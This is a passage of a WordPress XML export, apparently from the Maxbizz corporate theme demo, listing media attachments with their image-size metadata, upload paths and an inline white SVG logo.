		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:1137;s:4:"file";s:21:"2020/11/bg2-home4.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg2-home4-300x178.jpg";s:5:"width";i:300;s:6:"height";i:178;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg2-home4-1024x606.jpg";s:5:"width";i:1024;s:6:"height";i:606;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg2-home4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg2-home4-768x455.jpg";s:5:"width";i:768;s:6:"height";i:455;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg2-home4-1536x910.jpg";s:5:"width";i:1536;s:6:"height";i:910;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg2-home4-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:23:"bg2-home4-1200x1137.jpg";s:5:"width";i:1200;s:6:"height";i:1137;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04_Full_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/home/04_full_white-2/</link>
		<pubDate>Thu, 12 Nov 2020 07:59:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1956</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 07:59:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 07:59:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04_full_white-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/04_Full_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st0" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st0" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st0" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st0" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st0" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st0" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st0" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>map-footer-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_footer_builders/footer-1/map-footer-home4/</link>
		<pubDate>Thu, 12 Nov 2020 08:24:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/map-footer-home4.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1966</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 08:24:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 08:24:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[map-footer-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>300</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/map-footer-home4.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/map-footer-home4.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:328;s:6:"height";i:199;s:4:"file";s:28:"2020/07/map-footer-home4.png";s:5:"sizes";a:2:{s:6:"medium";a:4:{s:4:"file";s:28:"map-footer-home4-300x182.png";s:5:"width";i:300;s:6:"height";i:182;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"map-footer-home4-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>signature-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/signature-home4/</link>
		<pubDate>Thu, 12 Nov 2020 08:57:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/signature-home4.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1995</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 08:57:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 08:57:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[signature-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/signature-home4.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/signature-home4.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:203;s:6:"height";i:52;s:4:"file";s:27:"2020/11/signature-home4.png";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"signature-home4-150x52.png";s:5:"width";i:150;s:6:"height";i:52;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart-values-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/chart-values-home4/</link>
		<pubDate>Thu, 12 Nov 2020 09:25:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart-values-home4.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2026</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 09:25:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 09:25:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart-values-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart-values-home4.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/chart-values-home4.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:606;s:6:"height";i:342;s:4:"file";s:30:"2020/11/chart-values-home4.png";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:30:"chart-values-home4-300x169.png";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:30:"chart-values-home4-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:30:"chart-values-home4-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:30:"chart-values-home4-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart-project-home-4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/chart-project-home-4/</link>
		<pubDate>Thu, 12 Nov 2020 09:41:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2064</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 09:41:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 09:41:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart-project-home-4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart-project-home-4.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:606;s:6:"height";i:342;s:4:"file";s:32:"2020/09/chart-project-home-4.png";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:32:"chart-project-home-4-300x169.png";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"chart-project-home-4-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"chart-project-home-4-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"chart-project-home-4-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart1-service-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/marketing-research/chart1-service-home4/</link>
		<pubDate>Thu, 12 Nov 2020 09:52:03 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2074</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 09:52:03]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 09:52:03]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart1-service-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart1-service-home4.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/chart1-service-home4.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:466;s:6:"height";i:296;s:4:"file";s:32:"2020/11/chart1-service-home4.png";s:5:"sizes";a:2:{s:6:"medium";a:4:{s:4:"file";s:32:"chart1-service-home4-300x191.png";s:5:"width";i:300;s:6:"height";i:191;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"chart1-service-home4-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>img-btn-pdf-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/marketing-research/img-btn-pdf-home4/</link>
		<pubDate>Thu, 12 Nov 2020 09:57:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2076</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 09:57:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 09:57:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[img-btn-pdf-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/img-btn-pdf-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:270;s:6:"height";i:90;s:4:"file";s:29:"2020/11/img-btn-pdf-home4.jpg";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"img-btn-pdf-home4-150x90.jpg";s:5:"width";i:150;s:6:"height";i:90;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bannner-widget-home4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/bannner-widget-home4/</link>
		<pubDate>Thu, 12 Nov 2020 10:14:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bannner-widget-home4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
